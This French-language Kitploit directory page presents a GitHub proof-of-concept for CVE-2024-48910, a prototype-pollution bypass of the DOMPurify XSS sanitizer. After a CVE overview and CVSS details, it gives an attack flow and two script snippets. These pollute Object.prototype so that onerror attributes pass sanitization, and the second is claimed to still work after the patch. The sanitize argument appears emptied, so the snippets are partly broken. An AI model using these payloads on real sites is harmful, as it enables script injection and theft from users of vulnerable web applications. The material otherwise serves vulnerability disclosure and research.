Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/mitchellzhou1/cve-2024-48910-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité Web
GitHubmitchellzhou1/cve-2024-48910-poc

CVE-2024-48910-PoC

Exploit de preuve de concept pour CVE-2024-48910, démontrant un contournement de la pollution de prototype du sanitizer XSS DOMPurify pour exécuter du JavaScript arbitraire via des attributs HTML conçus.

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
2il y a 7 moisPas encore vérifié

CVE-2024-48910-PoC

image

Aperçu

CVE-2024-48910 DOMPurify, un assainisseur XSS ultra-rapide et ultra-tolérant, fonctionnant uniquement sur le DOM pour HTML, MathML et SVG, a été jugé vulnérable à la pollution des prototypes (CVE-2024-48910). La vulnérabilité a été découverte et corrigée dans la version 2.4.2, la divulgation initiale ayant eu lieu le 31 octobre 2024 .


Impact

La vulnérabilité de pollution des prototypes dans DOMPurify pourrait permettre aux attaquants de falsifier les attributs du prototype d'objets, conduisant potentiellement à des contournements de sécurité et à des modifications non autorisées du comportement de l'application. Le score CVSS élevé indique un impact potentiel significatif sur la sécurité du système, affectant particulièrement la confidentialité et l'intégrité des données.

Détails techniques

La vulnérabilité a obtenu un score de base CVSS v3.1 de 9.1 (CRITIQUE) avec le vecteur CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N. Cela indique que la vulnérabilité peut être exploitée à distance avec une faible complexité d'attaque, ne nécessite aucun privilège ni interaction de l'utilisateur, et peut avoir un impact élevé sur la confidentialité et l'intégrité, bien que sans affecter la disponibilité.


À partir des journaux de modifications, vous pouvez voir qu'un cas de test a été ajouté impliquant .__proto__., ce qui suggère qu'il s'agit d'une injection de prototype. image

La ligne suivante qui a été ajoutée était, ce qui signifie qu'avant, elle évaluait à true pour tout ce qui était truthy. image

Flux d'attaque & PoC

  1. Polluer hasOwnProperty pour qu'il retourne Object
  2. Polluer ALLOWED_ATTR avec ["src", "onerror"]
  3. DOMPurify clone sa configuration en utilisant la fonction clone() vulnérable
  4. La vérification hasOwnProperty réussit pour les propriétés polluées (car Object est truthy)
  5. La configuration polluée est copiée dans la configuration interne de DOMPurify

Protection XSS contournée - onerror est désormais "autorisé"

root@kitploit:~
<script>Object.prototype.hasOwnProperty=Object</script>
<script>Object.prototype.ALLOWED_ATTR=["src","onerror"]</script>
<script src=//cdn.jsdelivr.net/npm/[email protected]/dist/purify.min.js></script>
<script>document.write(DOMPurify.sanitize(''))</script>

Notes complémentaires :

Malgré la mise à niveau vers 2.4.2, je peux toujours faire apparaître alert()... il suffit de définir Object.prototype.hasOwnProperty = () => true; pour contourner la protection LOL!!

root@kitploit:~
<script>Object.prototype.hasOwnProperty = () => true;</script>
<script>Object.prototype.ALLOWED_ATTR=["src","onerror"]</script>
<script src=//cdn.jsdelivr.net/npm/[email protected]/dist/purify.min.js></script>
<script>document.write(DOMPurify.sanitize(''))</script>
Télécharger l’outil